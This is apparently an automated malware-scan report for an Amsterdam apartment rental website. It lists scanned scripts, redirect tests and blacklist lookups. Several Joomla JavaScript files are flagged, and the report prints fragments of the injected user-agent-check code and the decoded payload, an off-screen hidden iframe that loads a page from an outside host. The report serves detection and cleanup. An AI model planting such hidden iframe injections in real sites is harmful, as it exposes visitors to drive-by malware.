Scanned pages/files
Request | Server response | Status |
http://www.appartementen-amsterdam-visseringstaete.com/ | 200 OK Content-Length: 16997 Content-Type: text/html | clean |
http://www.appartementen-amsterdam-visseringstaete.com/media/system/js/caption.js | 200 OK Content-Length: 3800 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9930 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 18313 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 14091 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 4196 Content-Type: application/x-javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_news_show_gk2/scripts/engine.js | 200 OK Content-Length: 5470 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre NV--; $E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV); Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"}); if(list){ for(var k=0;k<NC;k++){ if(((NR-NV)*NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)*NC)-(1+k)].setStyle('display','none'); } } } }); } } }); }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/engine.js | 200 OK Content-Length: 8131 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre if(!play) this.image_pause($G); if((play || $G["autoanim"] == 1) && ($G["actual_anim"] == false)){ $G["actual_anim"] = (function(){ n = (n < max) ? n+1 : 0; $this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true); }).periodical($G["anim_speed"]*2+$G["anim_interval"]); } } }, image_pause : function($G){ $clear($G["actual_anim"]); $G["actual_anim"] = false; } }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45 | 200 OK Content-Length: 219 Content-Type: text/javascript | clean |
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/template_scripts.js | 200 OK Content-Length: 3782 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre if(h > max_height) max_height = h; }); $ES('.users', $('bottom_wrap')).each(function(el, i){ el.getChildren()[0].setStyle("height", max_height+"px"); }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk16_style',style,{duration: 200,path: "/"}); actual_style = style; } Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/jmenu_2.js | 200 OK Content-Length: 3723 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre levels.each(function(e,k){ e.each(function(a,l){ a.addEvent("mouseenter",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].toggle(); (function(){a.getChildren()[1].setStyle("overflow","")}).delay(500); }); a.addEvent("mouseleave",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].stop(); effects2[k][l].set(0); }); }); }); }); Decoded script: <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://www.appartementen-amsterdam-visseringstaete.com/templates/gk_gomuproject/lib/scripts/ie.js | 200 OK Content-Length: 2227 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre } }; })(); sfHover = function() { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Decoded script: function () { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfHover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");}; } } <iframe src="http://river.xdecor.eu/jfstrjarrdgfjrthdfherh12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit | 200 OK Content-Length: 1475 Content-Type: text/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 166991 Content-Type: application/x-javascript | clean |
http://www.booking.com/general.html?tmpl=bookit;aid=330843;lang=en;hotel_id=251788;pb=1 | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:10 GMT Location: http://www.booking.com/general.html?tmpl=bookit Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/general.html?tmpl=bookit | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:10 GMT Location: http://www.booking.com/general.html Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/general.html | HTTP/1.1 200 OK Date: Sat, 21 Jun 2014 14:53:10 GMT Server: nginx Vary: User-Agent, Accept-Encoding Content-Length: 227 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/index.html | HTTP/1.1 301 Moved Permanently Date: Sat, 21 Jun 2014 14:53:11 GMT Location: http://www.booking.com/ Server: nginx X-Cnection: close X-Recruiting: Like HTTP headers? Come write ours: https://workingatbooking.com X-UA-Compatible: IE=edge | clean |
http://www.booking.com/ | 200 OK Content-Length: 183436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Result:
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Referer: http://www.google.com/search?q=appartementen-amsterdam-visseringstaete.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: appartementen-amsterdam-visseringstaete.com
Referer: http://www.google.com/search?q=appartementen-amsterdam-visseringstaete.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=appartementen-amsterdam-visseringstaete.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://appartementen-amsterdam-visseringstaete.com/
Result: appartementen-amsterdam-visseringstaete.com is not infected or malware details are not published yet.
Result: appartementen-amsterdam-visseringstaete.com is not infected or malware details are not published yet.